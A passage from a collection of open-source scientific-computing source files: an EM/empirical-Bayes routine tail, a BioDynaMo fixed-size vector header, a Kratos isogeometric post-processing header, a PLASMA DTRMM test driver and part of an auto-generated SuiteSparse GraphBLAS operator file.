SEXP out = PROTECT(Rf_allocVector(VECSXP, 2));
(*prtCnt)++;
SEXP znk = PROTECT(Rf_allocMatrix(REALSXP, ds->N, res->K));
(*prtCnt)++;
SEXP ll = PROTECT(Rf_allocVector(REALSXP, 1));
(*prtCnt)++;
// TODO: change iteration to avoid tranposing on back end
// copy data to R vectors
for (int n = 0; n < ds->N; n++) {
for (int k = 0; k < res->K; k++) {
REAL(znk)[k * ds->N + n] = res->z[n][k];
}
}
REAL(ll)[0] = res->ll;
SEXP names = PROTECT(Rf_allocVector(STRSXP, 2));
(*prtCnt)++;
SET_VECTOR_ELT(out, 0, znk);
SET_VECTOR_ELT(out, 1, ll);
SET_STRING_ELT(names, 0, Rf_mkChar("z"));
SET_STRING_ELT(names, 1, Rf_mkChar("ll"));
Rf_setAttrib(out, R_NamesSymbol, names);
return out;
}
// functions for calculating beta params
double beta_hat(double N, double C, double a0) {
double nca = (N - C) * a0;
double bhat = ( nca + C + sqrt( (nca + C)*(nca + C) - 4.0*C*nca) ) / (2.0*C);
return bhat;
}
double alpha_hat(double N, double C, double bhat) {
double cbn = (C*bhat + N);
double ahat = (cbn + sqrt( cbn*cbn + 4.0*C*bhat*(C-N)) ) / (2.0*(N-C));
return ahat;
}
double beta_nought(double N, double C) {
return (N + sqrt(N*N - 4.0*C*(N-C)) )/(2.0*C);
}
double alpha_nought(double N, double C, double b0) {
double bcn = (b0*C + N);
double res = ( (b0*C - C + N) + sqrt( (bcn*bcn) + 4.0*C*(C-N)*b0) ) / (2.0*(N-C));
return res;
}
void empirical_bayes(Dataset* ds, double* alpha, double* beta) {
double C = 0.0;
double N = (double) ds->N * ds->D;
for (int n = 0; n < ds->N; n++) {
for (int d = 0; d < ds->D; d++) {
C += at(ds, n, d);
}
}
double b0 = beta_nought(N, C);
double a0 = alpha_nought(N, C, b0);
double bhat = beta_hat(N, C, a0);
double ahat = alpha_hat(N, C, bhat);
*alpha = ahat;
*beta = bhat;
}
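/* Usage sketch (hypothetical, not in the original file): estimate the prior
   once and feed it to the hierarchical M-step --
     double a, b;
     empirical_bayes(ds, &a, &b);
     proto_k_hbbmm(ds, z, protos[k], k, a, b);
   em() performs exactly this pairing internally before its main loop. */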
|
fixed_size_vector.h | // -----------------------------------------------------------------------------
//
// Copyright (C) 2021 CERN & Newcastle University for the benefit of the
// BioDynaMo collaboration. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
//
// See the LICENSE file distributed with this work for details.
// See the NOTICE file distributed with this work for additional information
// regarding copyright ownership.
//
// -----------------------------------------------------------------------------
#ifndef CORE_CONTAINER_FIXED_SIZE_VECTOR_H_
#define CORE_CONTAINER_FIXED_SIZE_VECTOR_H_
#include <cassert>
#include <cstddef>
namespace bdm {
/// Vector with fixed number of elements == Array with push_back function that
/// keeps track of its size
/// NB: No bounds checking. Do not call push_back more times than the
/// maximum number of elements given by the template parameter N
template <typename T, std::size_t N>
class FixedSizeVector {
public:
size_t size() const { return size_; } // NOLINT
const T& operator[](size_t idx) const { return data_[idx]; }
T& operator[](size_t idx) { return data_[idx]; }
FixedSizeVector& operator++() {
#pragma omp simd
for (size_t i = 0; i < N; i++) {
++data_[i];
}
return *this;
}
void clear() { size_ = 0; } // NOLINT
void push_back(const T& value) { // NOLINT
assert(size_ < N);
data_[size_++] = value;
}
const T* begin() const { return &(data_[0]); } // NOLINT
const T* end() const { return &(data_[size_]); } // NOLINT
T* begin() { return &(data_[0]); } // NOLINT
T* end() { return &(data_[size_]); } // NOLINT
private:
T data_[N];
std::size_t size_ = 0;
};
} // namespace bdm
#endif // CORE_CONTAINER_FIXED_SIZE_VECTOR_H_
|
bezier_post_utility.h | //
// Project Name: Kratos
// Last Modified by: $Author: hbui $
// Date: $Date: 2013-10-12 $
// Revision: $Revision: 1.0 $
//
//
#if !defined(KRATOS_BEZIER_POST_UTILITY_H_INCLUDED )
#define KRATOS_BEZIER_POST_UTILITY_H_INCLUDED
// System includes
#include <string>
#include <vector>
#include <iostream>
// External includes
#include <omp.h>
#include "boost/progress.hpp"
#ifdef ISOGEOMETRIC_USE_MPI
#include "mpi.h"
#endif
// Project includes
#include "includes/define.h"
#include "includes/model_part.h"
#include "includes/node.h"
#include "includes/element.h"
#include "includes/properties.h"
#include "includes/ublas_interface.h"
#include "includes/legacy_structural_app_vars.h"
#include "spaces/ublas_space.h"
#include "linear_solvers/linear_solver.h"
#include "utilities/openmp_utils.h"
#include "utilities/auto_collapse_spatial_binning.h"
#include "custom_geometries/isogeometric_geometry.h"
#include "custom_utilities/isogeometric_post_utility.h"
#include "isogeometric_application/isogeometric_application.h"
// #define DEBUG_LEVEL1
//#define DEBUG_LEVEL2
//#define DEBUG_MULTISOLVE
//#define DEBUG_GENERATE_MESH
// #define ENABLE_PROFILING
namespace Kratos
{
///@addtogroup IsogeometricApplication
///@{
///@name Kratos Globals
///@{
///@}
///@name Type Definitions
///@{
///@}
///@name Enum's
///@{
///@}
///@name Functions
///@{
///@}
///@name Kratos Classes
///@{
template<typename TDataType>
struct BezierPostUtility_Helper
{
typedef typename Element::GeometryType GeometryType;
typedef typename GeometryType::CoordinatesArrayType CoordinatesArrayType;
/// Interpolation on element
static TDataType& CalculateOnPoint(const Variable<TDataType>& rVariable,
TDataType& rResult, Element::Pointer& pElement, const CoordinatesArrayType& rCoordinates)
{
KRATOS_THROW_ERROR(std::logic_error, "Error calling unimplemented function", __FUNCTION__)
}
};
/// Short class definition.
/**
An advanced utility to export the FEM mesh directly from an isogeometric Bezier mesh. Each Bezier element generates its own set of FEM elements, so a large number of nodes and elements may be produced.
Use this utility with care for large problems. This class was previously named IsogeometricPostUtility.
*/
class BezierPostUtility : public IsogeometricPostUtility
{
public:
///@name Type Definitions
///@{
typedef boost::numeric::ublas::vector<double> ValuesContainerType;
typedef boost::numeric::ublas::matrix<double> ValuesArrayContainerType;
typedef typename ModelPart::NodesContainerType NodesArrayType;
typedef typename ModelPart::ElementsContainerType ElementsArrayType;
typedef typename ModelPart::ConditionsContainerType ConditionsArrayType;
typedef typename Element::GeometryType GeometryType;
typedef typename GeometryType::PointType NodeType;
typedef IsogeometricGeometry<NodeType> IsogeometricGeometryType;
typedef typename GeometryType::IntegrationPointsArrayType IntegrationPointsArrayType;
typedef typename GeometryType::CoordinatesArrayType CoordinatesArrayType;
typedef typename NodeType::DofsContainerType DofsContainerType;
typedef UblasSpace<double, CompressedMatrix, Vector> SerialSparseSpaceType;
typedef UblasSpace<double, Matrix, Vector> SerialDenseSpaceType;
typedef LinearSolver<SerialSparseSpaceType, SerialDenseSpaceType> LinearSolverType;
typedef std::size_t IndexType;
/// Pointer definition of BezierPostUtility
KRATOS_CLASS_POINTER_DEFINITION(BezierPostUtility);
///@}
///@name Life Cycle
///@{
/// Default constructor.
BezierPostUtility()
{
}
/// Destructor.
virtual ~BezierPostUtility()
{
}
///@}
///@name Operators
///@{
///@}
///@name Operations
///@{
// Synchronize post model_part with the reference model_part
template<class TVariableType>
void TransferNodalResults(
const TVariableType& rThisVariable,
ModelPart& r_model_part,
ModelPart& r_model_part_post) const
{
#ifdef ENABLE_PROFILING
double start_compute = OpenMPUtils::GetCurrentTime();
#endif
NodesArrayType& pTargetNodes = r_model_part_post.Nodes();
ElementsArrayType& pElements = r_model_part.Elements();
typename TVariableType::Type Results;
CoordinatesArrayType LocalPos;
int ElementId;
// #pragma omp parallel for
//TODO: check this. This is not parallelized.
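// (a parallel version would need an index-based loop plus per-iteration
//  copies of Results/LocalPos/ElementId, since the ptr_iterator loop below
//  shares those locals across iterations)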
for(typename NodesArrayType::ptr_iterator it = pTargetNodes.ptr_begin(); it != pTargetNodes.ptr_end(); ++it)
{
ElementId = (*it)->GetSolutionStepValue(PARENT_ELEMENT_ID);
noalias(LocalPos) = (*it)->GetSolutionStepValue(LOCAL_COORDINATES);
Results = BezierPostUtility_Helper<typename TVariableType::Type>::CalculateOnPoint(rThisVariable, Results, pElements(ElementId), LocalPos);
(*it)->GetSolutionStepValue(rThisVariable) = Results;
}
#ifdef ENABLE_PROFILING
double end_compute = OpenMPUtils::GetCurrentTime();
std::cout << "Transfer nodal point results for " << rThisVariable.Name() << " completed: " << end_compute - start_compute << " s" << std::endl;
#else
std::cout << "Transfer nodal point results for " << rThisVariable.Name() << " completed" << std::endl;
#endif
}
// Synchronize post model_part with the reference model_part
template<class TVariableType>
void TransferIntegrationPointResults(
const TVariableType& rThisVariable,
ModelPart& r_model_part,
ModelPart& r_model_part_post,
LinearSolverType::Pointer pSolver) const
{
#ifdef ENABLE_PROFILING
double start_compute = OpenMPUtils::GetCurrentTime();
std::cout << "########################################" << std::endl;
std::cout << "Transfer integration point results for "
<< rThisVariable.Name() << " starts" << std::endl;
#endif
// firstly transfer rThisVariable from integration points of reference model_part to its nodes
TransferVariablesToNodes(pSolver, r_model_part, rThisVariable);
// secondly transfer new nodal variables results to the post model_part
TransferNodalResults(rThisVariable, r_model_part, r_model_part_post);
#ifdef ENABLE_PROFILING
double end_compute = OpenMPUtils::GetCurrentTime();
std::cout << "Transfer integration point results for "
<< rThisVariable.Name() << " completed: "
<< end_compute - start_compute << "s" << std::endl;
std::cout << "########################################" << std::endl;
#endif
}
// Transfer the variable to nodes for model_part
template<class TVariableType>
void TransferVariablesToNodes(
const TVariableType& rThisVariable,
ModelPart& r_model_part,
LinearSolverType::Pointer pSolver) const
{
#ifdef ENABLE_PROFILING
double start_compute = OpenMPUtils::GetCurrentTime();
std::cout << "########################################" << std::endl;
std::cout << "Transfer integration point results to nodes for "
<< rThisVariable.Name() << " starts" << std::endl;
#endif
TransferVariablesToNodes(pSolver, r_model_part, rThisVariable);
#ifdef ENABLE_PROFILING
double end_compute = OpenMPUtils::GetCurrentTime();
std::cout << "Transfer integration point results to nodes for "
<< rThisVariable.Name() << " completed: "
<< end_compute - start_compute << "s" << std::endl;
std::cout << "########################################" << std::endl;
#endif
}
// Transfer the variable to nodes for model_part
template<class TVariableType>
void TransferVariablesToNodes(
const TVariableType& rThisVariable,
ModelPart& r_model_part,
ElementsArrayType& ElementsArray,
LinearSolverType::Pointer pSolver) const
{
#ifdef ENABLE_PROFILING
double start_compute = OpenMPUtils::GetCurrentTime();
std::cout << "########################################" << std::endl;
std::cout << "Transfer integration point results to nodes for "
<< rThisVariable.Name() << " starts" << std::endl;
#endif
TransferVariablesToNodes(pSolver, r_model_part, ElementsArray, rThisVariable);
#ifdef ENABLE_PROFILING
double end_compute = OpenMPUtils::GetCurrentTime();
std::cout << "Transfer integration point results to nodes for "
<< rThisVariable.Name() << " completed: "
<< end_compute - start_compute << "s" << std::endl;
std::cout << "########################################" << std::endl;
#endif
}
///@}
///@name Access
///@{
///@}
///@name Inquiry
///@{
///@}
///@name Input and output
///@{
/// Turn back information as a string.
virtual std::string Info() const
{
std::stringstream buffer;
buffer << "BezierPostUtility";
return buffer.str();
}
/// Print information about this object.
virtual void PrintInfo(std::ostream& rOStream) const
{
rOStream << "BezierPostUtility";
}
/// Print object's data.
virtual void PrintData(std::ostream& rOStream) const
{}
///@}
///@name Friends
///@{
///@}
protected:
///@name Protected static Member Variables
///@{
///@}
///@name Protected member Variables
///@{
///@}
///@name Protected Operators
///@{
///@}
///@name Protected Operations
///@{
///@}
///@name Protected Access
///@{
///@}
///@name Protected Inquiry
///@{
///@}
///@name Protected LifeCycle
///@{
///@}
private:
///@name Static Member Variables
///@{
///@}
///@name Member Variables
///@{
///@}
///@name Private Operators
///@{
///@}
///@name Private Operations
///@{
/**
* Transfer of rThisVariable defined on integration points to corresponding
* nodal values. The transformation is done in a form that minimizes the
* L_2-norm error \sum (rThisVariable - f(x))^2, where
* f(x) = \sum_i shape_func_i * rThisVariable_i
* @param model_part model_part on which the transfer should be done
* @param rThisVariable Vector-Variable which should be transferred
* @ref Jiao&Heath: "Common-refinement-based data transfer...", Int.
* Journal for numer. meth. in eng. 61 (2004) 2402--2427
* WARNING: this may cause segmentation faults as the respective variables
* will be created on nodal level while they are originally intended to be
* stored on integration points!
* @param pSolver the solver used for solving the local system matrix
* @param pModelPart pointer to model_part that we wish to transfer the result from its integration points to its nodes
* @param rThisVariable the variable whose respective values are to be transferred
* @param check_active if false the activeness of the elements will not be checked; true otherwise
* REMARKS: this subroutine will only transfer the variables to nodes connected with the mesh defined by ElementsArray
*/
void TransferVariablesToNodes(LinearSolverType::Pointer& pSolver,
ModelPart& r_model_part, ElementsArrayType& ElementsArray,
const Variable<double>& rThisVariable,
const bool& check_active = false) const;
/**
* Transfer of rThisVariable defined on integration points to corresponding
* nodal values. The transformation is done in a form that minimizes the
* L_2-norm error \sum (rThisVariable - f(x))^2, where
* f(x) = \sum_i shape_func_i * rThisVariable_i
* @param model_part model_part on which the transfer should be done
* @param rThisVariable Vector-Variable which should be transferred
* @ref Jiao&Heath: "Common-refinement-based data transfer...", Int.
* Journal for numer. meth. in eng. 61 (2004) 2402--2427
* WARNING: this may cause segmentation faults as the respective variables
* will be created on nodal level while they are originally intended to be
* stored on integration points!
* @param pSolver the solver used for solving the local system matrix
* @param pModelPart pointer to model_part that we wish to transfer the result from its integration points to its nodes
* @param rThisVariable the variable whose respective values are to be transferred
* REMARKS: + this subroutine will transfer the variables to nodes connected with the model_part. Do not use this subroutine if the model_part contains many element types.
* + the activeness of the element will not be checked
*/
void TransferVariablesToNodes(LinearSolverType::Pointer& pSolver,
ModelPart& r_model_part,
const Variable<double>& rThisVariable,
const bool& check_active = false) const;
/**
* Transfer of rThisVariable defined on integration points to corresponding
* nodal values. The transformation is done in a form that minimizes the
* L_2-norm error \sum (rThisVariable - f(x))^2, where
* f(x) = \sum_i shape_func_i * rThisVariable_i
* @param model_part model_part on which the transfer should be done
* @param rThisVariable Vector-Variable which should be transferred
* @ref Jiao&Heath: "Common-refinement-based data transfer...", Int.
* Journal for numer. meth. in eng. 61 (2004) 2402--2427
* WARNING: this may cause segmentation faults as the respective variables
* will be created on nodal level while they are originally intended to be
* stored on integration points!
* @param pSolver the solver used for solving the local system matrix
* @param pModelPart pointer to model_part that we wish to transfer the result from its integration points to its nodes
* @param rThisVariable the variable whose respective values are to be transferred
* @param ncomponents number of components of the nodal vector
* @param check_active if false the activeness of the elements will not be checked; true otherwise
* REMARKS: this subroutine will only transfer the variables to nodes connected with the mesh defined by ElementsArray
*/
void TransferVariablesToNodes(LinearSolverType::Pointer& pSolver,
ModelPart& r_model_part, ElementsArrayType& ElementsArray,
const Variable<Vector>& rThisVariable,
const std::size_t& ncomponents = 6,
const bool& check_active = false) const;
/**
* Transfer of rThisVariable defined on integration points to corresponding
* nodal values. The transformation is done in a form that minimizes the
* L_2-norm error \sum (rThisVariable - f(x))^2, where
* f(x) = \sum_i shape_func_i * rThisVariable_i
* @param model_part model_part on which the transfer should be done
* @param rThisVariable Vector-Variable which should be transferred
* @ref Jiao&Heath: "Common-refinement-based data transfer...", Int.
* Journal for numer. meth. in eng. 61 (2004) 2402--2427
* WARNING: this may cause segmentation faults as the respective variables
* will be created on nodal level while they are originally intended to be
* stored on integration points!
* REMARKS:
* + currently this method only works with 6-component variables such as STRESSES, PRESTRESS, etc.
* @param pSolver the solver used for solving the local system matrix
* @param pModelPart pointer to model_part that we wish to transfer the result from its integration points to its nodes
* @param rThisVariable the variable whose respective values are to be transferred
* @param ncomponents number of components of the nodal vector
* REMARKS: + this subroutine will transfer the variables to nodes connected with the model_part. Do not use this subroutine if the model_part contains many element types.
* + the activeness of the element will not be checked
*/
void TransferVariablesToNodes(LinearSolverType::Pointer& pSolver,
ModelPart& r_model_part,
const Variable<Vector>& rThisVariable,
const std::size_t& ncomponents = 6,
const bool& check_active = false) const;
///@}
///@name Private Access
///@{
///@}
///@name Private Inquiry
///@{
///@}
///@name Un accessible methods
///@{
/// Assignment operator.
BezierPostUtility& operator=(BezierPostUtility const& rOther)
{
return *this;
}
/// Copy constructor.
BezierPostUtility(BezierPostUtility const& rOther)
{
}
///@}
}; // Class BezierPostUtility
///@}
template<>
struct BezierPostUtility_Helper<double>
{
typedef typename Element::GeometryType GeometryType;
typedef typename GeometryType::CoordinatesArrayType CoordinatesArrayType;
/// Interpolation on element
static double& CalculateOnPoint(const Variable<double>& rVariable,
double& rResult, Element::Pointer& pElement, const CoordinatesArrayType& rCoordinates);
};
template<>
struct BezierPostUtility_Helper<Vector>
{
typedef typename Element::GeometryType GeometryType;
typedef typename GeometryType::CoordinatesArrayType CoordinatesArrayType;
/// Interpolation on element
static Vector& CalculateOnPoint(const Variable<Vector>& rVariable,
Vector& rResult, Element::Pointer& pElement, const CoordinatesArrayType& rCoordinates);
};
template<>
struct BezierPostUtility_Helper<array_1d<double, 3> >
{
typedef typename Element::GeometryType GeometryType;
typedef typename GeometryType::CoordinatesArrayType CoordinatesArrayType;
/// Interpolation on element
static array_1d<double, 3>& CalculateOnPoint(const Variable<array_1d<double, 3> >& rVariable,
array_1d<double, 3>& rResult, Element::Pointer& pElement, const CoordinatesArrayType& rCoordinates);
};
///@name Type Definitions
///@{
///@}
///@name Input and output
///@{
/// input stream function
inline std::istream& operator >>(std::istream& rIStream, BezierPostUtility& rThis)
{
return rIStream;
}
/// output stream function
inline std::ostream& operator <<(std::ostream& rOStream,
const BezierPostUtility& rThis)
{
rThis.PrintInfo(rOStream);
rOStream << std::endl;
rThis.PrintData(rOStream);
return rOStream;
}
///@}
///@} addtogroup block
}// namespace Kratos.
#undef DEBUG_LEVEL1
#undef DEBUG_LEVEL2
#undef DEBUG_MULTISOLVE
#undef DEBUG_GENERATE_MESH
#undef ENABLE_PROFILING
#endif
|
testing_dtrmm.c | /**
*
* @file testing_dtrmm.c
*
* PLASMA testing routines
* PLASMA is a software package provided by Univ. of Tennessee,
* Univ. of California Berkeley and Univ. of Colorado Denver
*
* @version 2.6.0
* @author Mathieu Faverge
* @date 2010-11-15
* @generated d Tue Jan 7 11:45:19 2014
*
**/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <math.h>
#include <plasma.h>
#include <cblas.h>
#include <lapacke.h>
#include "core_blas.h"
#include "testing_dmain.h"
#undef COMPLEX
#define REAL
static int check_solution(PLASMA_enum side, PLASMA_enum uplo, PLASMA_enum trans, PLASMA_enum diag,
int M, int N, double alpha,
double *A, int LDA,
double *Bref, double *Bplasma, int LDB);
int testing_dtrmm(int argc, char **argv)
{
/* Check for number of arguments*/
if ( argc != 5 ) {
USAGE("TRMM", "alpha M N LDA LDB",
" - alpha : alpha coefficient\n"
" - M : number of rows of matrices B\n"
" - N : number of columns of matrices B\n"
" - LDA : leading dimension of matrix A\n"
" - LDB : leading dimension of matrix B\n");
return -1;
}
double alpha = (double) atol(argv[0]);
int M = atoi(argv[1]);
int N = atoi(argv[2]);
int LDA = atoi(argv[3]);
int LDB = atoi(argv[4]);
double eps;
int info_solution;
int s, u, t, d, i;
int LDAxM = LDA*max(M,N);
int LDBxN = LDB*max(M,N);
double *A = (double *)malloc(LDAxM*sizeof(double));
#pragma omp register([LDAxM]A)
double *B = (double *)malloc(LDBxN*sizeof(double));
#pragma omp register([LDBxN]B)
double *Binit = (double *)malloc(LDBxN*sizeof(double));
#pragma omp register([LDBxN]Binit)
double *Bfinal = (double *)malloc(LDBxN*sizeof(double));
#pragma omp register([LDBxN]Bfinal)
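/* (the "register" pragmas above appear to be OmpSs-style extensions that
   register each buffer with the runtime; they are not standard OpenMP and
   a plain OpenMP compiler may reject them) */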
/* Check if unable to allocate memory */
if ( (!A) || (!B) || (!Binit) || (!Bfinal)){
printf("Out of Memory \n ");
return -2;
}
eps = LAPACKE_dlamch_work('e');
printf("\n");
printf("------ TESTS FOR PLASMA DTRMM ROUTINE ------- \n");
printf(" Size of the Matrix B : %d by %d\n", M, N);
printf("\n");
printf(" The matrix A is randomly generated for each test.\n");
printf("============\n");
printf(" The relative machine precision (eps) is to be %e \n",eps);
printf(" Computational tests pass if scaled residuals are less than 10.\n");
/*----------------------------------------------------------
* TESTING DTRMM
*/
/* Initialize A, B, C */
LAPACKE_dlarnv_work(IONE, ISEED, LDAxM, A);
LAPACKE_dlarnv_work(IONE, ISEED, LDBxN, B);
for(i=0;i<max(M,N);i++)
A[LDA*i+i] = A[LDA*i+i] + 2.0;
for (s=0; s<2; s++) {
for (u=0; u<2; u++) {
#ifdef COMPLEX
for (t=0; t<3; t++) {
#else
for (t=0; t<2; t++) {
#endif
for (d=0; d<2; d++) {
memcpy(Binit, B, LDBxN*sizeof(double));
memcpy(Bfinal, B, LDBxN*sizeof(double));
/* PLASMA DTRMM */
PLASMA_dtrmm(side[s], uplo[u], trans[t], diag[d],
M, N, alpha, A, LDA, Bfinal, LDB);
/* Check the solution */
info_solution = check_solution(side[s], uplo[u], trans[t], diag[d],
M, N, alpha, A, LDA, Binit, Bfinal, LDB);
printf("***************************************************\n");
if (info_solution == 0) {
printf(" ---- TESTING DTRMM (%s, %s, %s, %s) ...... PASSED !\n",
sidestr[s], uplostr[u], transstr[t], diagstr[d]);
}
else {
printf(" ---- TESTING DTRMM (%s, %s, %s, %s) ... FAILED !\n",
sidestr[s], uplostr[u], transstr[t], diagstr[d]);
}
printf("***************************************************\n");
}
}
}
}
free(A); free(B);
free(Binit); free(Bfinal);
return 0;
}
/*--------------------------------------------------------------
* Check the solution
*/
static int check_solution(PLASMA_enum side, PLASMA_enum uplo, PLASMA_enum trans, PLASMA_enum diag,
int M, int N, double alpha,
double *A, int LDA,
double *Bref, double *Bplasma, int LDB)
{
int info_solution;
double Anorm, Binitnorm, Bplasmanorm, Blapacknorm, Rnorm, result;
double eps;
double mzone = (double)-1.0;
double *work = (double *)malloc(max(M, N)* sizeof(double));
int Am, An;
if (side == PlasmaLeft) {
Am = M; An = M;
} else {
Am = N; An = N;
}
Anorm = LAPACKE_dlantr_work(LAPACK_COL_MAJOR, lapack_const(PlasmaInfNorm), lapack_const(uplo), lapack_const(diag),
Am, An, A, LDA, work);
Binitnorm = LAPACKE_dlange_work(LAPACK_COL_MAJOR, lapack_const(PlasmaInfNorm), M, N, Bref, LDB, work);
Bplasmanorm = LAPACKE_dlange_work(LAPACK_COL_MAJOR, lapack_const(PlasmaInfNorm), M, N, Bplasma, LDB, work);
cblas_dtrmm(CblasColMajor, (CBLAS_SIDE)side, (CBLAS_UPLO)uplo, (CBLAS_TRANSPOSE)trans,
(CBLAS_DIAG)diag, M, N, (alpha), A, LDA, Bref, LDB);
Blapacknorm = LAPACKE_dlange_work(LAPACK_COL_MAJOR, lapack_const(PlasmaInfNorm), M, N, Bref, LDB, work);
cblas_daxpy(LDB * N, (mzone), Bplasma, 1, Bref, 1);
Rnorm = LAPACKE_dlange_work(LAPACK_COL_MAJOR, lapack_const(PlasmaInfNorm), M, N, Bref, LDB, work);
eps = LAPACKE_dlamch_work('e');
printf("Rnorm %e, Anorm %e, Binitnorm %e, Bplasmanorm %e, Blapacknorm %e\n",
Rnorm, Anorm, Binitnorm, Bplasmanorm, Blapacknorm);
result = Rnorm / ((Anorm + Blapacknorm) * max(M,N) * eps);
printf("============\n");
printf("Checking the norm of the difference against reference DTRMM \n");
printf("-- ||Cplasma - Clapack||_oo/((||A||_oo+||B||_oo).N.eps) = %e \n", result);
if ( isinf(Blapacknorm) || isinf(Bplasmanorm) || isnan(result) || isinf(result) || (result > 10.0) ) {
printf("-- The solution is suspicious ! \n");
info_solution = 1;
}
else {
printf("-- The solution is CORRECT ! \n");
info_solution= 0 ;
}
free(work);
return info_solution;
}
|
GB_binop__second_fc64.c |
//------------------------------------------------------------------------------
// GB_binop: hard-coded functions for each built-in binary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2021, All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
//------------------------------------------------------------------------------
// If this file is in the Generated2/ folder, do not edit it
// (it is auto-generated from Generator/*).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_emult.h"
#include "GB_control.h"
#include "GB_ek_slice.h"
#include "GB_dense.h"
#include "GB_atomics.h"
#include "GB_bitmap_assign_methods.h"
#include "GB_binop__include.h"
// C=binop(A,B) is defined by the following types and operators:
// A+B function (eWiseAdd): GB (_AaddB__second_fc64)
// A.*B function (eWiseMult): GB (_AemultB_08__second_fc64)
// A.*B function (eWiseMult): GB (_AemultB_02__second_fc64)
// A.*B function (eWiseMult): GB (_AemultB_04__second_fc64)
// A.*B function (eWiseMult): GB (_AemultB_bitmap__second_fc64)
// A*D function (colscale): GB (_AxD__second_fc64)
// D*A function (rowscale): GB (_DxB__second_fc64)
// C+=B function (dense accum): GB (_Cdense_accumB__second_fc64)
// C+=b function (dense accum): GB (_Cdense_accumb__second_fc64)
// C+=A+B function (dense ewise3): GB ((none))
// C=A+B function (dense ewise3): GB (_Cdense_ewise3_noaccum__second_fc64)
// C=scalar+B GB ((none))
// C=scalar+B' GB ((none))
// C=A+scalar GB ((none))
// C=A'+scalar GB ((none))
// C type: GxB_FC64_t
// A type: GxB_FC64_t
// A pattern? 1
// B type: GxB_FC64_t
// B pattern? 0
// BinaryOp: cij = bij
#define GB_ATYPE \
GxB_FC64_t
#define GB_BTYPE \
GxB_FC64_t
#define GB_CTYPE \
GxB_FC64_t
// true if the types of A and B are identical
#define GB_ATYPE_IS_BTYPE \
1
// true if the types of C and A are identical
#define GB_CTYPE_IS_ATYPE \
1
// true if the types of C and B are identical
#define GB_CTYPE_IS_BTYPE \
1
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA,A_iso) \
;
// true if values of A are not used
#define GB_A_IS_PATTERN \
1
// bij = Bx [pB]
#define GB_GETB(bij,Bx,pB,B_iso) \
GxB_FC64_t bij = GBX (Bx, pB, B_iso)
// true if values of B are not used
#define GB_B_IS_PATTERN \
0
// declare scalar of the same type as C
#define GB_CTYPE_SCALAR(t) \
GxB_FC64_t t
// cij = Ax [pA]
#define GB_COPY_A_TO_C(cij,Ax,pA,A_iso) \
cij = GBX (Ax, pA, A_iso)
// cij = Bx [pB]
#define GB_COPY_B_TO_C(cij,Bx,pB,B_iso) \
cij = GBX (Bx, pB, B_iso)
#define GB_CX(p) Cx [p]
// binary operator
#define GB_BINOP(z,x,y,i,j) \
z = y ;
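// (SECOND(x,y) = y, which is why A is declared pattern-only above:
//  its values never reach z)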
// true if the binop must be flipped
#define GB_BINOP_FLIP \
0
// op is second
#define GB_OP_IS_SECOND \
1
// do the numerical phases of GB_add and GB_emult
#define GB_PHASE_2_OF_2
// hard-coded loops can be vectorized
#define GB_PRAGMA_SIMD_VECTORIZE GB_PRAGMA_SIMD
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_SECOND || GxB_NO_FC64 || GxB_NO_SECOND_FC64)
//------------------------------------------------------------------------------
// C += A+B, all 3 matrices dense
//------------------------------------------------------------------------------
#if 0
// The op must be MIN, MAX, PLUS, MINUS, RMINUS, TIMES, DIV, or RDIV.
void GB ((none))
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#include "GB_dense_ewise3_accum_template.c"
}
#endif
//------------------------------------------------------------------------------
// C = A+B, all 3 matrices dense
//------------------------------------------------------------------------------
void GB (_Cdense_ewise3_noaccum__second_fc64)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#include "GB_dense_ewise3_noaccum_template.c"
}
//------------------------------------------------------------------------------
// C += B, accumulate a sparse matrix into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumB__second_fc64)
(
GrB_Matrix C,
const GrB_Matrix B,
const int64_t *B_ek_slicing, const int B_ntasks, const int B_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
#include "GB_dense_subassign_23_template.c"
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += b, accumulate a scalar into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumb__second_fc64)
(
GrB_Matrix C,
const GB_void *p_bwork,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
// get the scalar b for C += b, of type GxB_FC64_t
GxB_FC64_t bwork = (*((GxB_FC64_t *) p_bwork)) ;
#include "GB_dense_subassign_22_template.c"
return (GrB_SUCCESS) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = A*D, column scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_AxD__second_fc64)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix D,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GxB_FC64_t *restrict Cx = (GxB_FC64_t *) C->x ;
#include "GB_AxB_colscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = D*B, row scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_DxB__second_fc64)
(
GrB_Matrix C,
const GrB_Matrix D,
const GrB_Matrix B,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GxB_FC64_t *restrict Cx = (GxB_FC64_t *) C->x ;
#include "GB_AxB_rowscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseAdd: C=A+B, C<M>=A+B, C<!M>=A+B
//------------------------------------------------------------------------------
GrB_Info GB (_AaddB__second_fc64)
(
GrB_Matrix C,
const int C_sparsity,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool is_eWiseUnion,
const GB_void *alpha_scalar_in,
const GB_void *beta_scalar_in,
const bool Ch_is_Mh,
const int64_t *restrict C_to_M,
